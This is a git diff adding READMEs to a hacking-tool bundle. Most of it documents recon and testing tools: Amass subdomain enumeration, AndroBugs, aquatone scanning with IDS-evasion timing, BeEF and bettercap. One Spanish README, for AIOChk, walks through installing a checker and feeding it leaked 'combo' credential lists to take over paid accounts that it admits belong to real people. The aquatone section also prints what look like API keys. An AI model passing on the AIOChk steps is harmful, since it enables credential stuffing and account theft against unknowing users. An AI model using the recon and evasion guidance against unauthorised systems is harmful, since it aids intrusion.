-max-dns-queries 200 -whois -d example.com | +| -noresolvrate | Disable resolver rate monitoring | amass intel -cidr 104.154.0.0/15 -noresolvrate | +| -noresolvscore | Disable resolver reliability scoring | amass intel -cidr 104.154.0.0/15 -noresolvscore | +| -o | Path to the text output file | amass intel -o out.txt -whois -d example.com | +| -org | Search string provided against AS description information | amass intel -org Facebook | +| -p | Ports separated by commas (default: 443) | amass intel -cidr 104.154.0.0/15 -p 443,8080 | +| -r | IP addresses of preferred DNS resolvers (can be used multiple times) | amass intel -r 8.8.8.8,1.1.1.1 -whois -d example.com | +| -rf | Path to a file providing preferred DNS resolvers | amass intel -rf data/resolvers.txt -whois -d example.com | +| -src | Print data sources for the discovered names | amass intel -src -whois -d example.com | +| -timeout | Number of minutes to execute the enumeration | amass intel -timeout 30 -d example.com | +| -whois | All discovered domains are run through reverse whois | amass intel -whois -d example.com | + +### The 'enum' Subcommand + +This subcommand will perform DNS enumeration and network mapping while populating the selected graph database. All the setting available in the configuration file are relevant to this subcommand. 
The following flags are available for configuration: + +| Flag | Description | Example | +|------|-------------|---------| +| -active | Enable active recon methods | amass enum -active -d example.com -p 80,443,8080 | +| -aw | Path to a different wordlist file for alterations | amass enum -aw PATH -d example.com | +| -bl | Blacklist of subdomain names that will not be investigated | amass enum -bl blah.example.com -d example.com | +| -blf | Path to a file providing blacklisted subdomains | amass enum -blf data/blacklist.txt -d example.com | +| -brute | Perform brute force subdomain enumeration | amass enum -brute -d example.com | +| -config | Path to the INI configuration file | amass enum -config config.ini | +| -d | Domain names separated by commas (can be used multiple times) | amass enum -d example.com | +| -demo | Censor output to make it suitable for demonstrations | amass enum -demo -d example.com | +| -df | Path to a file providing root domain names | amass enum -df domains.txt | +| -dir | Path to the directory containing the graph database | amass enum -dir PATH -d example.com | +| -do | Path to data operations output file | amass enum -do data.json -d example.com | +| -ef | Path to a file providing data sources to exclude | amass enum -ef exclude.txt -d example.com | +| -exclude | Data source names separated by commas to be excluded | amass enum -exclude crtsh -d example.com | +| -if | Path to a file providing data sources to include | amass enum -if include.txt -d example.com | +| -include | Data source names separated by commas to be included | amass enum -include crtsh -d example.com | +| -ip | Show the IP addresses for discovered names | amass enum -ip -d example.com | +| -ipv4 | Show the IPv4 addresses for discovered names | amass enum -ipv4 -d example.com | +| -ipv6 | Show the IPv6 addresses for discovered names | amass enum -ipv6 -d example.com | +| -json | Path to the JSON output file | amass enum -json out.json -d example.com | +| -list | Print 
the names of all available data sources | amass enum -list | +| -log | Path to the log file where errors will be written | amass enum -log amass.log -d example.com | +| -max-dns-queries | Maximum number of concurrent DNS queries | amass enum -max-dns-queries 200 -d example.com | +| -min-for-recursive | Subdomain labels seen before recursive brute forcing (Default: 1) | amass enum -brute -min-for-recursive 3 -d example.com | +| -nf | Path to a file providing already known subdomain names (from other tools/sources) | amass enum -nf names.txt -d example.com | +| -noalts | Disable generation of altered names | amass enum -noalts -d example.com | +| -nolocaldb | Disable saving data into a local database | amass enum -nolocaldb -d example.com | +| -norecursive | Turn off recursive brute forcing | amass enum -brute -norecursive -d example.com | +| -noresolvrate | Disable resolver rate monitoring | amass enum -d example.com -noresolvrate | +| -noresolvscore | Disable resolver reliability scoring | amass enum -d example.com -noresolvscore | +| -o | Path to the text output file | amass enum -o out.txt -d example.com | +| -oA | Path prefix used for naming all output files | amass enum -oA amass_scan -d example.com | +| -passive | A purely passive mode of execution | amass enum --passive -d example.com | +| -p | Ports separated by commas (default: 443) | amass enum -d example.com -p 443,8080 | +| -r | IP addresses of preferred DNS resolvers (can be used multiple times) | amass enum -r 8.8.8.8,1.1.1.1 -d example.com | +| -rf | Path to a file providing preferred DNS resolvers | amass enum -rf data/resolvers.txt -d example.com | +| -src | Print data sources for the discovered names | amass enum -src -d example.com | +| -timeout | Number of minutes to execute the enumeration | amass enum -timeout 30 -d example.com | +| -w | Path to a different wordlist file | amass enum -brute -w wordlist.txt -d example.com | + +### The 'viz' Subcommand + +Create enlightening network graph 
visualizations that add structure to the information gathered. This subcommand only leverages the 'output_directory' and remote graph database settings from the configuration file. + +The files generated for visualization are created in the current working directory and named amass_TYPE + +Switches for outputting the DNS and infrastructure findings as a network graph: + +| Flag | Description | Example | +|------|-------------|---------| +| -config | Path to the INI configuration file | amass viz -config config.ini -d3 | +| -d | Domain names separated by commas (can be used multiple times) | amass viz -d3 -d example.com | +| -d3 | Output a D3.js v4 force simulation HTML file | amass viz -d3 -d example.com | +| -df | Path to a file providing root domain names | amass viz -d3 -df domains.txt | +| -dir | Path to the directory containing the graph database | amass viz -d3 -dir PATH -d example.com | +| -enum | Identify an enumeration via an index from the db listing | amass viz -enum 1 -d3 -d example.com | +| -gexf | Output to Graph Exchange XML Format (GEXF) | amass viz -gephi -d example.com | +| -graphistry | Output Graphistry JSON | amass viz -graphistry -d example.com | +| -i | Path to the Amass data operations JSON input file | amass viz -d3 -d example.com | +| -maltego | Output a Maltego Graph Table CSV file | amass viz -maltego -d example.com | +| -visjs | Output HTML that employs VisJS | amass viz -visjs -d example.com | + +### The 'track' Subcommand + +Shows differences between enumerations that included the same target(s) for monitoring a target's attack surface. This subcommand only leverages the 'output_directory' and remote graph database settings from the configuration file. 
Flags for performing Internet exposure monitoring across the enumerations in the graph database: + +| Flag | Description | Example | +|------|-------------|---------| +| -config | Path to the INI configuration file | amass track -config config.ini | +| -d | Domain names separated by commas (can be used multiple times) | amass track -d example.com | +| -df | Path to a file providing root domain names | amass track -df domains.txt | +| -dir | Path to the directory containing the graph database | amass track -dir PATH | +| -history | Show the difference between all enumeration pairs | amass track -history | +| -last | The number of recent enumerations to include in the tracking | amass track -last NUM | +| -since | Exclude all enumerations before a specified date (format: 01/02 15:04:05 2006 MST) | amass track -since DATE | + +### The 'db' Subcommand + +Performs viewing and manipulation of the graph database. This subcommand only leverages the 'output_directory' and remote graph database settings from the configuration file. 
Flags for interacting with the enumeration findings in the graph database include: + +| Flag | Description | Example | +|------|-------------|---------| +| -config | Path to the INI configuration file | amass db -config config.ini | +| -d | Domain names separated by commas (can be used multiple times) | amass db -d example.com | +| -demo | Censor output to make it suitable for demonstrations | amass db -demo -d example.com | +| -df | Path to a file providing root domain names | amass db -df domains.txt | +| -dir | Path to the directory containing the graph database | amass db -dir PATH | +| -enum | Identify an enumeration via an index from the listing | amass db -enum 1 -show | +| -import | Import an Amass data operations JSON file to the graph database | amass db -import PATH | +| -ip | Show the IP addresses for discovered names | amass db -show -ip -d example.com | +| -ipv4 | Show the IPv4 addresses for discovered names | amass db -show -ipv4 -d example.com | +| -ipv6 | Show the IPv6 addresses for discovered names | amass db -show -ipv6 -d example.com | +| -json | Path to the JSON output file | amass db -names -silent -json out.json -d example.com | +| -list | Print enumerations in the database and filter on domains specified | amass db -list | +| -names | Print just discovered names | amass db -names -d example.com | +| -nocolor | Disable colorized output | amass db -names -nocolor -d example.com | +| -o | Path to the text output file | amass db -names -o out.txt -d example.com | +| -show | Print the results for the enumeration index + domains provided | amass db -show | +| -silent | Disable all output during execution | amass db -names -silent -json out.json -d example.com | +| -src | Print data sources for the discovered names | amass db -show -src -d example.com | +| -summary | Print just ASN table summary | amass db -summary -d example.com | + +## The Output Directory + +Amass has several files that it outputs during an enumeration (e.g. the log file). 
If you are not using a database server to store the network graph information, then Amass creates a file based graph database in the output directory. These files are used again during future enumerations, and when leveraging features like tracking and visualization. + +By default, the output directory is created in the operating system default root directory to use for user-specific configuration data and named *amass*. If this is not suitable for your needs, then the subcommands can be instructed to create the output directory in an alternative location using the **'-dir'** flag. + +If you decide to use an Amass configuration file, it will be automatically discovered when put in the output directory and named **config.ini**. + +## The Configuration File + +You will need a config file to use your API keys with Amass. See the [Example Configuration File](../examples/config.ini) for more details. + +Amass automatically tries to discover the configuration file in the following locations: + +| Operating System | Path | +| ---------------- | ---- | +| Linux / Unix | `$XDG_CONFIG_HOME/amass/config.ini` or `$HOME/.config/amass/config.ini` | +| Windows | `%AppData%\amass\config.ini` | +| OSX | `$HOME/Library/Application Support/amass/config.ini` | + +These are good places for you to put your configuration file. + +Note that these locations are based on the [output directory](#the-output-directory). If you use the `-dir` flag, the location where Amass will try to discover the configuration file will change. For example, if you pass in `-dir ./my-out-dir`, Amass will try to discover a configuration file in `./my-out-dir/config.ini`. 
+ +### Default Section + +| Option | Description | +|--------|-------------| +| mode | Determines which mode the enumeration is performed in: default, passive or active | +| output_directory | The directory that stores the graph database and other output files | +| maximum_dns_queries | The maximum number of concurrent DNS queries that can be performed | +| include_unresolvable | When set to true, causes DNS names that did not resolve to be printed | + +### The network_settings Section + +| Option | Description | +|--------|-------------| +| address | IP address or range (e.g. a.b.c.10-245) that is in scope | +| asn | ASN that is in scope | +| cidr | CIDR (e.g. 192.168.1.0/24) that is in scope | +| port | Specifies a port to be used when actively pulling TLS certificates | + +### The domains Section + +| Option | Description | +|--------|-------------| +| domain | A root DNS domain name to be added to the enumeration scope | + +### The resolvers Section + +| Option | Description | +|--------|-------------| +| resolver | The IP address of a DNS resolver and used globally by the amass package | +| score_resolvers | Toggle resolver reliability scoring | +| monitor_resolver_rate | Toggle resolver rate monitoring | + +### The blacklisted Section + +| Option | Description | +|--------|-------------| +| subdomain | A DNS subdomain name to be considered out of scope during the enumeration | + +### The disabled_data_sources Section + +| Option | Description | +|--------|-------------| +| data_source | One of the Amass data sources that is **not** to be used during the enumeration | + +### The gremlin Section + +| Option | Description | +|--------|-------------| +| url | URL in the form of "ws://host:port" where Amass will connect to a TinkerPop database | +| username | User of the TinkerPop database server that can access the Amass graph database | +| password | Valid password for the user identified by the 'username' option | + +### The bruteforce Section + +| Option | 
Description | +|--------|-------------| +| enabled | When set to true, brute forcing is performed during the enumeration | +| recursive | When set to true, brute forcing is performed on discovered subdomain names as well | +| minimum_for_recursive | Number of discoveries made in a subdomain before performing recursive brute forcing | +| wordlist_file | Path to a custom wordlist file to be used during the brute forcing | + +### The alterations Section + +| Option | Description | +|--------|-------------| +| enabled | When set to true, permuting resolved DNS names is performed during the enumeration | +| minimum_for_word_flip | Number of times a word must be seen before using it for future word flips and word additions | +| edit_distance | Number of times an edit operation will be performed on a name sample during fuzzy label searching | +| flip_words | When set to true, causes words in DNS names to be exchanged for others in the alteration word list | +| flip_numbers | When set to true, causes numbers in DNS names to be exchanged for other numbers | +| add_words | When set to true, causes other words in the alteration word list to be added to resolved DNS names | +| add_numbers | When set to true, causes numbers to be added and removed from resolved DNS names | +| wordlist_file | Path to a custom wordlist file that provides additional words to the alteration word list | + +### Data Source Sections + +Each Amass data source service can have a dedicated configuration file section. The section is named just as in the output from the 'amass enum -list' command. + +This is how data sources can be configured that have authentication requirements. 
+ +| Option | Description | +|--------|-------------| +| apikey | The API key to be used when accessing the data source | +| secret | An additional secret to be used with the API key | +| username | User for the data source account | +| password | Valid password for the user identified by the 'username' option | + +## The Graph Database + +All Amass enumeration findings are stored in a graph database. This database is either located in a single file within the output directory or connected to remotely using settings provided by the configuration file. + +When a new enumeration begins and a graph database already exists with previous findings for the same target(s), the subdomain names from those previous enumerations are utilized in the new enumeration. New DNS queries are performed against those subdomain names to ensure that they are still legitimate and to obtain current IP addresses. + +The results from each enumeration is stored separately in the graph database, which allows the tracking subcommand to look for differences across the enumerations and provide the user with highlights about the target. + +There is nothing preventing multiple users from sharing a single (remote) graph database and leveraging each others findings across enumerations. + +### Cayley Graph Schema + +The GraphDB is storing all the domains that were found for a given enumeration. It stores the associated information such as the ip, ns_record, a_record, cname, ip block and associated source for each one of them as well. Each enumeration is identified by a uuid. + +Here is an example of graph for an enumeration run on example.com: + +![GraphDB](../images/example_graphDB.png) + +## Importing OWASP Amass Results into Maltego + +1. Convert the Amass data into a Maltego graph table CSV file: + +```bash +amass viz -maltego +``` + +2. 
Import the CSV file with the correct Connectivity Table settings: + +![Connectivity table](../images/maltego_graph_import_wizard.png "Connectivity Table Settings") + +3. All the Amass findings will be brought into your Maltego Graph: + +![Maltego results](../images/maltego_results.png "Maltego Results") + +## Integrating OWASP Amass into Your Work + +If you are using the amass package within your own Go code, be sure to properly seed the default pseudo-random number generator: + +```go +package main + +import ( + "fmt" + "math/rand" + "time" + + "github.com/OWASP/Amass/v3/config" + "github.com/OWASP/Amass/v3/datasrcs" + "github.com/OWASP/Amass/v3/enum" + "github.com/OWASP/Amass/v3/systems" +) + +func main() { + // Seed the default pseudo-random number generator + rand.Seed(time.Now().UTC().UnixNano()) + + // Setup the most basic amass configuration + cfg := config.NewConfig() + cfg.AddDomain("example.com") + + sys, err := systems.NewLocalSystem(cfg) + if err != nil { + return + } + sys.SetDataSources(datasrcs.GetAllSources(sys)) + + e := enum.NewEnumeration(cfg, sys) + if e == nil { + return + } + defer e.Close() + + e.Start() + for _, o := range e.ExtractOutput(nil) { + fmt.Println(o.Name) + } +} +``` + +In case you get an error saying "Failed to create the graph", try changing the output directory in the config: + +```go +cfg := config.NewConfig() +cfg.Dir = "/tmp" + +sys, err := services.NewLocalSystem(cfg) +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/androbugs.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/androbugs.md new file mode 100755 index 00000000..f4d02d11 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/androbugs.md @@ -0,0 +1,110 @@ +# AndroBugs Framework + +AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. 
+No splendid GUI interface, but the most efficient (less than 2 minutes per scan on average) and more accurate. + +Version: 1.0.0 + +#### Features + +- Find security vulnerabilities in an Android app +- Check if the code is missing best practices +- Check dangerous shell commands (e.g. “su”) +- Collect Information from millions of apps +- Check the app’s security protection (marked as ``````, designed for app repackaging hacking) + + +## Author + +- Yu-Cheng Lin (androbugs.framework at gmail.com, @AndroBugs) + +## Setup Steps and Usage for Windows + +**Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework** + +1. mkdir C:\AndroBugs_Framework +2. cd C:\AndroBugs_Framework +3. Unzip the latest Windows version of AndroBugs Framework from [Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases) +4. Go to Computer->System Properties->Advanced->Environment Variables. Add "C:\AndroBugs_Framework" to the "Path" variable +5. ```androbugs.exe -h``` +6. ```androbugs.exe -f [APK file]``` + +## Massive Analysis Tool Setup Steps and Usage for Windows +1. Complete the *Setup Steps and Usage for Windows* first +2. Install the Windows version of MongoDB (https://www.mongodb.org/downloads) +3. Install [PyMongo library](http://api.mongodb.org/python/current/installation.html) +4. Configure your own MongoDB settings: C:\AndroBugs_Framework\androbugs-db.cfg +5. Choose your preferred MongoDB management tool (http://mongodb-tools.com/) +6. ```AndroBugs_MassiveAnalysis.exe -h``` + - Example: ```AndroBugs_MassiveAnalysis.exe -b 20151112 -t BlackHat -d .\All_Your_Apps\ -o .\Massive_Analysis_Reports``` +7. 
```AndroBugs_ReportByVectorKey.exe -h``` + - Example: ```AndroBugs_ReportByVectorKey.exe -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat``` + +## Usage for Unix/Linux + +#### To run the AndroBugs Framework: + +``` +python androbugs.py -f [APK file] +``` + +#### To check the usage: + +``` +python androbugs.py -h +``` + +## Usage of Massive Analysis Tools for Unix/Linux + +**Prerequisite: Setup MongoDB and configure your own MongoDB settings in "androbugs-db.cfg"** + +#### To run the massive analysis for AndroBugs Framework: + +``` +python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory] +``` + +Example: +``` +python AndroBugs_MassiveAnalysis.py -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports +``` + + +#### To get the summary report and all the vectors of massive analysis: + +``` +python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag] +``` + +Example: +``` +python AndroBugs_ReportSummary.py -m massive -b 20151112 -t BlackHat +``` + + +#### To list the potentially vulnerable apps by Vector ID and Severity Level (Log Level): + +``` +python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag] +python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -a +``` + +Example: +``` +python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat +python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat -a +``` + +![AndroBugs_ReportSummary.py](http://www.androbugs.com/images/v1.0.0/MassiveAnalysisTool2.png) + +![AndroBugs_ReportByVectorKey.py](http://www.androbugs.com/images/v1.0.0/MassiveAnalysisTool1.png) + +## Requirements + +- Python 2.7.x (DO NOT USE Python 3.X) +- [PyMongo library](http://api.mongodb.org/python/current/installation.html) (If 
you want to use the massive analysis tool) + +## Licenses + +* AndroBugs Framework is under the license of [GNU GPL v3.0](http://www.gnu.org/licenses/gpl-3.0.txt) + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aoichk.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aoichk.md new file mode 100755 index 00000000..b6cf1124 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aoichk.md @@ -0,0 +1,75 @@ +# AIOChk v0.0.1 + +## Introducción + +Genera cuentas autopay "autopagables". Este proyecto tiene fines educativos y/o demostrativos. + +Tenemos un grupo en facebook > https://www.facebook.com/groups/275991826662363 + +## Novedades +> - Checkeo de versión. + +## Instalación +AIOChk [TERMUX] +Como todos preguntan "¿Qué es Termux?" +Bueno *Termux* es un emulador de terminal linux para android... lo mismo que en la pc pero mas barato.... [Termux está en la +play store (gratis)] + +> Hay que tener una vpn (obligatorio) que cada vez que saquemos cuentas de facebook -solo +facebook-. + +Hay que tener un combo [Nulled Foro (o otros foros/paginas) para Descargar combos] (deben de registrarse y ya) Tambien el Es File Explorer para encontrar la ruta del archivo. + +Una vez descargado TERMUX y el AIOChk hay que actualizar paquetes... De Termux Y darle permiso a +termux en nuestro terminal... + +A los que no les pide actualizar paquetes ponen directo el 2do comando y aceptar (enter)... + +> 1. apt update&&apt upgrade -y + +> 2. termux-setup-storage + +INSTALAMOS PHP y GIT para clonar el repositorio... + +> 3. pkg install php git -y + +> 4. git clone https://github.com/Juni0r007/AIOChk.git + +> 5. ls + +> 6. cd AIOChk + +Ejecutamos el archivo *.php + +Antes de eso hay que darle permisos de ejecución al script + +> 7. chmod +x * + +> 8. 
php aio.php + +# Uso + +Ya instalado para ejecutar cada vez que abra Termux solo poner el comando: + +> cd AIOChk;php aio.php + +Una vez terminado el proceso solo deberan elegir el número de que cuenta (spotify,p0rnhub,facebook,etc) quieren generar y despues solo deberan poner la ruta del combo para generar las cuentas y solo tendran que esperar a que se generen las cuentas autopay. + +Es obligatorio -por el momento- usar una vpn (solo facebook) + +Si descargaron el combo, ahi lo unico que se debe hacer es poner la ruta completa del COMBO que estará en la carpeta de Download +> Van con el Es File hasta donde está el combo y presionan un rato sobre el archivo -> Propiedades -> Copiar ruta completa y se van a termux y pegan esa ruta. + +Y lo pegan, empezara el checkeo y esperar a que les muestre una premium.[Autopay]. + +> Una vez terminado el proceso de checkeo o cuando cancele manualmente el mismo, el script le pedira si quiere guardar las cuentas obtenidas en un archivo de texto (dentro de su memoria interna) si quiere guardar escriba la letra "s" y consiguiente escriba solo el nombre del archivo a crear, de lo contrario solo escriba la letra "n". + +No es necesario utilizar proxys ni una vpn activa. + +¿Que es una cuenta Auto Pagable o AutoPay? + +Son cuentas obtenidas con Sentry MBA y PasteBin [Termux pero no todas] en si estas son 100% reales por lo cual las paga una persona y si cambias la contraseña el dueño va a cancelar la cuenta. + +## Anexos + +- Generador de combos en Termux > https://github.com/Juni0r007/PasTerm diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aquatone.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aquatone.md new file mode 100755 index 00000000..3bd788f0 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aquatone.md @@ -0,0 +1,88 @@ +AQUATONE del alemán Michael Henriksen es un conjunto de herramientas escritas en Ruby para realizar reconocimientos de nombres de dominio. 
Puede descubrir subdominios usando fuentes abiertas o mediante fuerza bruta usando un diccionario. + +Después del descubrimiento de subdominios, AQUATONE puede escanear los hosts para identificar puertos web comunes. Además puede reunir y consolidar en un informe los encabezados HTTP, cuerpos HTML y capturas de pantalla para un análisis rápido de la superficie de ataque. + +Antes de su uso debemos añadir nuestras keys de las APIs de Shodan y Virustotal: + +$ aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ +$ aquatone-discover --set-key virustotal 132d0h354bd538656ek435876567b1g757945342347654as548f3264a8724g19 + +AQUATONE se divide en tres comandos, según queramos o no descubrir subdominios, escanear los hosts y/o obtener información de los servicios (gathering), cada una representando distintas fases que vemos a continuación: + +#Fase 1: descubrimiento (aquatone-discover) + +Lo primero que hace AQUATONE es consultar los DNS con la autoridad para el dominio objetivo. De esta manera se asegura que la información obtenida está actualizada. Luego hace una prueba rápida para ver si el dominio de destino está configurado para ser un dominio wildcard, si lo es, identificará las posibles respuestas wildcard y las filtrará. 
Posteriormente, procede a preguntar a cada módulo de para recopilar los subdominios: + +- Diccionario brute force (ver diccionario aquí) +- DNSDB.org http://dnsdb.org/ +- Informe de Transparencia de Google +- HackerTarget +- Netcraft +- Shodan (requiere clave de API) +- ThreatCrowd +- VirusTotal (requiere clave de API) + +El comando básico es el siguiente: + +$ aquatone-discover --domain example.com + +Por defecto tirará 5 hilos, si queremos aumentar el número para que vaya más rápido podemos usar el parámetro --threads: + +$ aquatone-discover --domain example.com --threads 25 + +Si por el contrario no queremos hacer mucho ruido podemos espaciar cada consulta DNS cada el número de segundos que especifiquemos con --sleep y un retardo variable con --jitter para evadir posibles IDS: + +$ aquatone-discover --domain example.com --sleep 5 --jitter 30 + +AQUATONE descubre los servidores DNS que resuelven los nombres de dominio objetivo y reparte las consultas entre ellos. Si las consultas hacia estos DNS fallan por defecto realizará las consultas a los DNS de Google para maximizar los resultados. Podemos especificar también otros DNS de "reserva" con: + +$ aquatone-discover --domain example.com --fallback-nameservers 87.98.175.85,5.9.49.12 + +Una vez finalizado el descubrimiento de dominios y subdominios los resultados se almacenarán en el fichero hosts.txt y hosts.json para facilitar el parseo. + +#Fase 2: escaneo (aquatone-scan) + +La etapa de escaneo es donde AQUATONE enumera los servicios web/puertos TCP abiertos en los hosts descubiertos anteriormente: + +$ aquatone-scan --domain example.com + +De forma predeterminada, aquatone-scan buscará en cada host presente en el fichero hosts.json los siguientes puertos TCP: 80, 443, 8000, 8080 y 8443. 
Estos son puertos muy comunes para servicios web y proporcionan una cobertura razonable, pero si queremos especificar nuestra propia lista de puertos, podemos utilizar la opción --ports: + +$ aquatone-scan --domain example.com --ports 80,443,3000,8080 + +En lugar de una lista de puertos separados por comas, también podemos especificar algunos alias predefinidos: + +- small: 80, 443 +- medium: 80, 443, 8000, 8080, 8443 (same as default) +- large: 80, 81, 443, 591, 2082, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 55672 +- huge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5280, 5281, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 80 + +80, 8081, 8083, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8337, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 11371, 12443, 16080, 18091, 18092, 20720, 55672 + +Por ejemplo: + +$ aquatone-scan --domain example.com --ports large + +Al igual que aquatone-discover, puede hacer el escaneado más o menos agresivo con la opción --threads que acepta un número de subprocesos para escaneos de puertos concurrentes. El número predeterminado de subprocesos es 5. + +$ aquatone-scan --domain example.com --threads 25 + +Como aquatone-scan está realizando el escaneo de puertos, obviamente puede ser detectado por IDS. Si bien tratará de reducir el riesgo de detección mediante la asignación al azar de hosts y puertos, se puede ajustar también más con las opciones --sleep y --jitter como anteriormente. Hay que tener en cuenta que el parámetro --sleep forzará los subprocesos a 1. 
+ +#Fase 3: Gathering (aquatone-gather) + +La etapa final es la parte de recopilación de información y análisis de los servicios web descubiertos, donde se guardan los encabezados de respuesta HTTP y los cuerpos HTML, además de tomar capturas de pantalla de las páginas web para facilitar el análisis. La captura de pantalla se realiza con la biblioteca Nightmare.js de Node.js que se instalará automáticamente si no está presente en el sistema. + +Eso sí, si trabajás con Kali u otra distro que no tenga previamente Node.js tendréis que instalarlo previamente: + +$ pkg install nodejs -y + +Luego el último comando será: + +$ aquatone-gather --domain example.com + +Aquatone-gather buscará hosts.json y open_ports.txt en el directorio de AQUATONE del dominio correspondiente y solicitará una captura de pantalla de cada dirección IP para cada nombre de dominio. + +Al igual que aquatone-discover y aquatone-scan, puede hacer la recopilación más o menos agresiva con la opción --threads que acepta un número de subprocesos para las solicitudes concurrentes. El número predeterminado de subprocesos es también 5. + +$ aquatone-gather --domain example.com --threads 25 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/beef.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/beef.md new file mode 100755 index 00000000..50603cfe --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/beef.md @@ -0,0 +1,18 @@ +Ataques al navegador del usuario usando BeEF + +BeEF es un framework que está orientado en la explotación de vulnerabilidades en los navegadores web. Podemos usar como vector de ataque un XSS (una vulnerabilidad XSS reflejado o persistente) y mediante un iframe oculto o fichero JavaScript (JS) se pueden robar credenciales, o bien usar simples ataques de ingeniería social preguntando por la instalación de falsos certificados de seguridad, falsas actualizaciones de Flash Player o simplemente simular una sesión caducada de Facebook. 
+ +BeEF es la abreviatura de The Browser Exploitation Framework. Es una herramienta de pruebas de penetración que se centra en el navegador web. + +En medio de la creciente preocupación por los ataques procedentes de Internet en contra de los clientes, incluyendo clientes móviles, BeEF permite la prueba de intrusión profesional para evaluar la situación de seguridad actual de un entorno de destino mediante el uso de vectores de ataque del lado del cliente. A diferencia de otros entornos de seguridad, BeEF mira más allá del perímetro de la red endurecido y sistema cliente, y examina explotabilidad en el marco de la puerta abierta: el navegador web. + +BeEF enganchará (hook) uno o más de los navegadores web y los utilizan como cabezas para el lanzamiento de los módulos de comando dirigidas y nuevos ataques contra el sistema desde dentro del contexto del explorador. + +Introducción +The Browser Exploitation Framework (BeEF ) es una poderosa herramienta de seguridad profesional. La BeEF usa técnicas pioneras que proporcionan la prueba de intrusión con experiencia a los vectores de ataque del lado del cliente prácticos. A diferencia de otros marcos de seguridad , BeEF se centra en el aprovechamiento de las vulnerabilidades del navegador para evaluar la postura de seguridad de un objetivo. Este proyecto es desarrollado exclusivamente para la investigación legal y pruebas de penetración . + +BeEF engancha (Hook ) uno o más navegadores web como cabezas de playa para la puesta en marcha de los módulos de mando dirigidos . Cada navegador es probable que sea en un contexto de seguridad diferente , y cada contexto puede proporcionar un conjunto de vectores de ataque únicos. El marco permite que el probador de la penetración pueda seleccionar los módulos específicos ( en tiempo real ) para apuntar a cada navegador , y por lo tanto a cada contexto. + +El marco contiene numerosos módulos de comando que emplean API sencilla y potente de la BeEF. 
Esta API está en el corazón de la eficacia y eficiencia de la estructura. Se abstrae la complejidad y facilita el desarrollo rápido de los módulos personalizados. + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/bettercap.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/bettercap.md new file mode 100755 index 00000000..3e848c3e --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/bettercap.md @@ -0,0 +1,36 @@ +**bettercap** is the Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and attacks. + +## How to Install + +A [precompiled version is available](https://github.com/bettercap/bettercap/releases) for each release, alternatively you can use the latest version of the source code from this repository in order to build your own binary. + +Make sure you have a correctly configured **Go >= 1.8** environment, that `$GOPATH/bin` is in `$PATH`, that the `libpcap-dev` and `libnetfilter-queue-dev` (this one is only required on Linux) package installed for your system and then: + + $ go get github.com/bettercap/bettercap + $ cd $GOPATH/src/github.com/bettercap/bettercap + $ make build && sudo make install + +This command will download bettercap, install its dependencies, compile it and move the `bettercap` executable to `/usr/local/bin`. + +Now you can use `sudo bettercap -h` to show the basic command line options and just `sudo bettercap` to start an +[interactive session](https://github.com/bettercap/bettercap/wiki/Interactive-Mode) on your default network interface, otherwise you can [load a caplet](https://github.com/bettercap/bettercap/wiki/Caplets). 
